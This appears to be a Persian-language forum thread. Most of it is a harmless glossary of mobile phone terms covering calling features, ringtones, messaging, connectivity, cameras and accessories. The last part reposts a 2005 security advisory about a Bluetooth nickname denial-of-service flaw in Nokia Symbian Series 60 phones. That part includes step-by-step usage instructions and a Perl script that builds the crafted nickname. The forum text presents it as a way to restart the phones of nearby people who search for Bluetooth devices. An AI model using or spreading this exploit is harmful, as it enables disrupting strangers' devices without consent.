* SCROLL KEYS (كليدهاي بالا وپايين برنده): كليد و يا كليدهايي واقع در صفحه شماره گير كه به كاربراجازه ميدهد در طول منوي اصلي بالا و پايين رود.
(منو): منوي اصلي تلفن همراه كه فهرست گزينه هاي موجود را در اختيارتان قرار ميدهد.
* END (پايان): دگمه اي واقع بر صفحه كليد كه به مكالمه خاتمه ميدهد.
* DATA (داده): اطلاعات قابل پردازش توسط دستگاه (اعداد، حروف و نمادها).
* DEAD SPOT (نقطه كور): محدوده اي كه تحت پوشش سرويس تلفن همراه نميباشد.
* DIMENTIONS: ابعاد تلفن همراه.
* WEIGHT: وزن تلفن همراه كه معمولا به اونس ميباشد.
* PHONE LOCK (قفل تلفن): قفل تلفن همراه بمنظور جلوگيري از استفاده افراد غير مجاز.
* KEYPAD LOCK: قفل صفحه كليد بمنظور جلوگيري از فشرده شدن اتفاقي دگمه ها.
* MASTER RESET: برگرداندن به حالت اوليه كارخانه كه سبب پاك شدن تمام تنظيمات و حافظه كاربر ميگردد.
* VOICE RECOGNITION (تشخيص صدا): به تلفن امكان ميدهد به فرامين صوتي پاسخ گويد.
* CLOCK: ساعت تلفن همراه.
* ALARM CLOCK: زنگ اخبار تلفن همراه.
* CALENDER: تقويم در تلفن همراه.
* REMINDER: ياداوري كننده در تلفن همراه .
* GAMES: بازيهاي تلفنهاي همراه معمولا توسط برنامه جاوا نوشته ميگردند.
* SCREEN SAVER: تصويري كه هنگام بلا استفاده ماندن تلفن همراه بروي صفحه نمايش پديدار ميگردد.
* PDA (دستيار ديجيتال شخصي): دستگاه قابل حمل و كوچك كه بعنوان سازمان دهنه الكترونيكي عمل ميكند. كنترل و مديريت آدرسها، قرار ملاقاتها، نت برداري ها، برنامه هاي آتي و غيره را بعهده ميگيرد.
* GPS (سيستم موقعيت ياب جهاني): سيستمي متشكل از 24 ماهواره،كامپيوتر هاي پيشرفته و فرستنده و گيرنده هاي متعدد كه بمنظور تعيين طول و عرض جغرافيايي بكار گرفته ميشود.با در اختيار داشتن يك گيرنده جي پي اس شما قادر خواهيد بود موقعيت دقيق خود را در سطح زمين يافته و از طريق آن اقدام به جهت يابي نيز كنيد.
* FLASHLIGHT: چراغ قوه.
* MP3 PLAYER: قابليت تلفن همراه در ضبط و پخش فايلهاي با فرمت MP3.
اصطلاحات مربوط به شماره گيري و برقراري ارتباط
* PHONE BOOK (دفترچه تلفن): محل ذخيره سازي شماره تلفن ها و اسامي مربوط به آنها.
* INCOMING CALL: تماس دريافتي .
* MEMORY DIALING (شماره گيري حافظه اي): شماره تلفنهاي پر استفاده را ميتوان ذخيره نمود و با فشردن يك دگمه تماس را برقرار ساخت.
* MULTIPLE NUMBER (شماره هاي متعدد): با اين قابليت قادر خواهيد بود براي يك نام در دفترچه تلفن خود چندين شماره تلفن اختصاص دهيد.
* MULTIPLE/ANY KEY ANSWER (پاسخ با هر دگمه): با اين قابليت قادر خواهيد بود به تماس دريافتي با فشردن هر كدام از كليد هاي تلفن پاسخ گوييد.
* CALL FORWARDING/DIVERT (انتقال مكالمه): انتقال و يا دايورت تماسها به تلفن همراه و يا ثابت ديگر.
* PHOTO ID(تصوير شناسنده): اختصاص يك عكس و تصوير به يك شماره تلفن خاص كه هنگام برقراري تماس توسط آن شماره عكس مورد نظر نمايش داده ميگردد.
* RINGER ID (زنگ شناسنده): اختصاص يك آهنگ زنگ به يك شماره تلفن خاص.
* SPEED DIALING (شماره گيري سريع): به شما امكان ميدهد تا با يك شماره تلفن از پيش تعيين شده با فشردن يك، دو و يا سه شماره ابتدايي آن تماس را برقرار سازيد.
* VOICE ACTIVATED DIALING (شماره گيري صوتي): شماره گيري توسط فرامين صوتي بجاي شماره گيري دستي.
* CONFERENCE CALLING (مكالمه 3 جانبه): به كاربر امكان ميدهد تا همزمان با 2 فرد ديگر مكالمه 3 جانبه برقرار سازد.
* EMERGENCY DIALING (شماره گيري اضطراري): ذخيره يك شماره تلفن مهم در حافظه تلفن.شما قادر خواهيد بود حتي در صورت قفل بودن تلفن با اين شماره تماس برقرار كنيد.
* ACTIVE FLIP COVER: قابليتي در تلفتهاي تا شونده كه كاربر قادر ميباشد با گشودن صفحه پوشاننده صفحه كليد به تماس پاسخ گويد.
* AUTAMATIC ANSWER(پاسخ گويي خودكار): اين قابليت به كاربر اجازه ميدهد تا به تماس دريافتي بدون نياز به فشردن هر گونه كليدي پاسخ گويد. اين حالت همراه با هندز فري فعال ميگردد.
* MISSED CALL: تماس ناموفق و پاسخ داده نشده.
* REDIAL: شماره گيري مجدد آخرين شماره.
* AUTOMATIC REDIAL: شماره گيري مجدد در صورت اشغال بودن خط بطور خودكار.
* CALL BLOCKING (سد تماس): دريافت و يا برقراري تماس با يك شماره تلفن خاص را در دستگاه سد ميكند.
* CALL WAITING (انتظار مكالمه): اين سرويس به كاربر اجازه ميدهد كه حين مكالمه از تماس دوم خود مطلع گشته (با شنيدن صداي بيب) و به آن پاسخ گويد.(بدون نياز به قطع تماس پيشين)
* (CALLER ID(CLI): قابليتي كه شماره تلفن(و حتي نام) تماس گيرنده را نمايش ميدهد.
* CALL LOG/REGISTER (اطلاعات وآمار ثبت تماسها): به كاربر امكان ميدهد تا شماره هاي پيشين ارسالي و دريافتي خود را مشاهده نمايد.
* RECIEVED CALL: تماسهاي دريافتي.
* ERASE RECENT : اين حالت تمام اطلاعات تماسهاي اخير را پاك ميكند.
اصطلاحات مربوط به زنگ و صداي تلفن همراه
* SILENT RINGER (زنگ خاموش): در اين حالت تماسهاي دريافتي تنها با نور چشمك زن اطلاع داده ميگردد.
* SILENT KEYPAD: در اين حالت هنگام فشردن دگمه هاي صفحه كليد صدايي توليد نميگردد.
* VIBRATION ALERT (حالت ويبره): در اين حالت تماسهاي دريافتي با ايجاد لرزش و ارتعاش تلفن همراه اطلاع داده ميشود.
* RINGTONE: آهنگ زنگ تلفن همراه.
* RINGTONE COMPOSER (ساخت آهنگ): نرم افزاري درون تلفنهاي همراه كه شما را قادر ميسازد با فشردن متوالي كليدهاي صفحه شماره گيرنده آهنگ زنگ دلخواه خود را بسازيد.
* MONOPHONIC RINGTONE: آهنگهاي زنگ تك نت. تنها يك نت ساده را مينوازد.
* POLYPHONIC RINGTONE: آهنگهاي زنگي كه قادر به نواختن نتهاي متعدد بصورت همزمان ميباشد.كه سبب ميگردد آهنگ طبيعي تر بنظر آيد.
* REAL TONE : زنگ با آهنگ طبيعي.(بصورت MP3)
* SPEAKER PHONE: آيفون در تلفن همراه كه صدا را بلند تر از حالت معمول از بلندگو پخش ميكند.
* VOLUME CONTROL (كنترل صدا): تنظيم بلندي صدا.
* MUTE: قطع صداي تلفن.
* DTMF: تنهايي(TONE) ميباشد كه تلفن همراه براي ارتباط برقرار ساختن با سيستمهاي تلفني فعال شونده توسط تن مانند پست صوتي و يا خدمات تلفني بانكها،ارسال ميكند.
* BEEP: صداي كوتاه بيپ.
اصطلاحات مربوط به پيغامها ، اينترنت دورنگار
* SMS (سرويس پيام كوتاه): به مشترك امكان ميدهد تا يك متن كوتاه را ارسال كند(تا 160 كاراكتر)
* SMS CHAT: چت توسط سرويس پيام كوتاه .
* EMS (سرويس پيام توسعه يافته): در اين نوع سرويس كاربر قادر خواهد بود متنها ي فرمت شده، آهنگ، تصوير، اصوات و تصاوير متحرك را در قالب پيام ارسال كند.
* MMS (سرويس پيامرسان ديجيتال): پيشرفته ترين نوع سرويس ارسال پيام كه كاربر قادر است فيلم ويدئويي و صدا را همراه با متن ساده ارسال دارد .
* MESSAGE ALERT: نشانگري كه پست صوتي ناموفق را اطلاع ميدهد.
* ICONS (نماد تصويري): تصاوير ساده اي كه ميتوان آنها را همراه با متن SMS به تلفنهاي همراه ديگر ارسال كرد.
* INBOX (ورودي): محل ثبت پيامهاي دريافتي.
* EMAIL CAPABILITY: قابليت تلفن همراه در ارسال و دريافت ايميل توسط مودم.
* DATA/FAX CAPABILITY: قابليت تلفن همراه براي دريافت و ارسال دورنگار و داده، دسترسي به اينترنت و ارسال ايميل.
* PICTURE MESSAGING: ارسال تصويرهاي ساده توسط SMS.
* VOICE MAIL (پست صوتي): سرويسي كه تماسهاي دريافتي را پاسخ داده و پيغامهاي صوتي دريافتي را ثبت و ضبط ميكند.
* ANSWERING MACHINE (منشي تلفن): ضبط صداي كاربر و پاسخ گويي خودكار هنگام دريافت تماس توسط آن.
* PAGER (فراخوان): اين قابليت تلفن همراه را مبدل به پيجر ميكند.
* WAP (پروتوكل كاربري بيسيم): استانداردي است كه تلفن همراه را قادر به سير و دسترسي به اينترنت ميسازد.
* HDML: زبان برنامه ريزي طراحي صفحات وب ويژه تلفنهاي همراه.
* MICRO-BROWSER: جستجوگر اينترنت ويژه تلفن همراه.
اصطلاحات مربوط به نحوه اتصال تلفن همراه به ديگر لوازم
* USB (گذرگاه سريال جهاني): يك رابط ميان كامپيوتر و ديگر لوازم الكترونيكي همچون موبايل ميباشد.
* DATA INTERFACE LINK: متعلقاتي كه سبب اتصال تلفن همراه براي انتفال داده به كامپيوتر و يا دستگاه فكس ميگردد.
* BLUETOOTH: بلوتوس تكنولوژي بيسيمي ميباشد كه لوازم الكترونيكي همچون تلفن، كامپيوترها و ديگر تجهيزات را بدون سيم و توسط فركانسهاي راديويي كم قدرت به يكديگر متصل ميسازد. (البته در فواصل نزديك)
* IrDA=INFRARED PORT (پورت مادون قرمز): اين تكنولوژي به شما امكان مبادله اطلاعات ميان دو دستگاه الكتريكي مانند تلفن همراه با كامپيوتر را ميدهد.بدون سيم و با بكارگيري امواج مادون قرمز.
* EXPANSION /MEMORY CARD (كارت حافظه): كارتهاي حافظه سبب افزودن حافظه بيشتر به تلفن همراه ميگردند.انواع كارتهاي حافظه شامل:SD-MINISD-MMC-STICK MEMORY-SMC ميباشند.
* CARD READER (كارت خوان): واسط ميان كارت حافظه و كامپيوتر ميباشد.
* PC SYNC: اين قابليت به كاربر امكان ميدهد تا تلفن همراه خود را توسط كابل ديتا به كامپيوتر متصل سازد.
* DATA CABLE (كابل ديتا): كابلي است كه با آن قادر به متصل ساختن تلفن همراه به كامپيوتر خواهيد بود.
اصطلاحات مربوط به دوربين
* BUILT-IN CAMERA: دوربين عكاسي تعبيه شده در تلفن همراه.
* CAMERA RECORDER: دوربين فيلمبرداري.
* FLASH: فلاش دوربين.
* DIGITAL ZOOM: بزرگنمايي لنز دوربين بصورت ديجيتال.
* MEGAPIXEL: مگاپيكسل ميزان وضوح وكيفيت دوربين عكاسي و فيلمبرداري را نشان ميدهد.
* VIDEO CLIP: كليپهاي ويديويي.
اصطلاحات مربوط به لوازم جانبي تلفن همراه
* FACE PLATE (قاب): قاب تلفن همراه ميباشد كه در برخي از مدلها شما قادر به تعويض آن ميباشيد.
* HANDS-FREE (هندز فري): وسيله اي است كه به شما امكان ميدهد تا با تلفن همراه خود بدون نياز به نگاهداشتن گوشي با دست به مكالمه بپردازيد.
* CASE: جلد براي محافظت از تلفن همراه.
* RADIATION SHIELD (اشعه گير): وسيله اي براي جذب امواج مضر تلفن همراه.
* HEAD SET: هد ست همان هندز فري ميباشد.
* STRAP: بند تلفن همراه.
* BELT CLIP/HOLSTERS/HOLDERS (نگاهدارنده ها): اين لوزم به شما امكان ميدهند تا تلفن همراه خود را به كمربند،كيف دستي و يا جيب خود متصل كنيد.و يا آنكه آن را درون اتومبيل خود به داشبورد اتصال دهيد.
* CAR KIT (كيت خودرو): كيتي است كه امكان استفاده از هندز فري در داخل اتومبيل براي شما فراهم مي آورد. كيت معمولا شامل: شارژر، نگهدارنده، هندز فيري، ميباشد. مدلهاي پيشرفته تر آنتن و بلندگوهاي اضافي را نيز شامل ميگردد![]()
با استفاده از BLUETOOTH NICKNAME گوشی های سری ۶۰ را رستارت کنید
با این کد میتوانید گوشی افرادی که در حال سرچ بلوتوس هستند و به گوشی شما میرسند و در حال جستجو فعال بودن بلوتوس گوشی شما هستند را ریست کنید.
این کد در مورد تمام گوشی های سری ۶۰ عمل میکند.
#*#*#*#*#*#*#*#*#* MobiBug Security Mailing List #*#*#*#*#*#*#*#*#*
Title: Nokia Symbian 60 "BLUETOOTH NICKNAME" Remote Restart
Release Date: 03/06/2005
Vulnerability Type: Denial of serce via network
Severity: Hight
Model affected: All Symbian 60
Auth: [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
Disclaimer:
==========
The information is provided "as is" without warranty of any kind.
The author of this issue shall not be held liable for any
damages due to the informations contained in this advisory.
Vulnerability Description:
=========================
Q-Nix reported a vulnerability in Nokia's Symbian operating system. A remote user can cause denial of service conditions. A remote user can set specially crafted nickname. Then, when a target user searches available Bluetooth devices and discovers the nickname, the target user's phone will restart.
Q-Nix: "This exploit is for nokia symbian 60 (ser.60) , a vulnerability in nokia bluetooth , it cause a Remote restart for any one who search in bluetooth devices and find your nick name.
BOOMB AND HIS PHONE RESTARTS !!! ..."
1- Run the exploit and make a nickname .
2- Send the output to your nokia phone .
3- Open the file in your mobile and copy the nickname .
4- Paste the nickname in bluetooth phone name .
5- Have a nice time.
my $btnick;
my $bth;
my $bts;
my $file;
$bth = " .";
print "\n*********************************************** ********\n";
print "** NOKIA REMOTE RESTART IN BLUETOOTH NICKNAME **\n";
print "** BY QNIX | info[@]persianbyte[dot]com **\n";
print "** GREETZ TO : vamljjp . beafgfbcake , QatagbvcrBoy , C0cghNIK **\n";
print "** bigman , Qhjg , Hdfh , Silent **\n";
print "** And all Security 4 Arab members **\n";
print "************************************************* ******\n";
print " \n WRITE YOUR BLUETOOTH NICKNAME : ";
$btnick = <STDIN>;
chomp($btnick);
print " \n OUTPUT : ";
$file = <STDIN>;
chomp($file);
open(BLUEN, ">>$file") || die "Could not create file $!\n";
$bts = "$btnick$bth";
print BLUEN ("$bts");
close(BLUEN);
print "\n Done !!HAVE A NICE TIME L4m3rZ \n\n";
هم اکنون 1 کاربر در حال مشاهده این تاپیک میباشد. (0 کاربر عضو شده و 1 مهمان)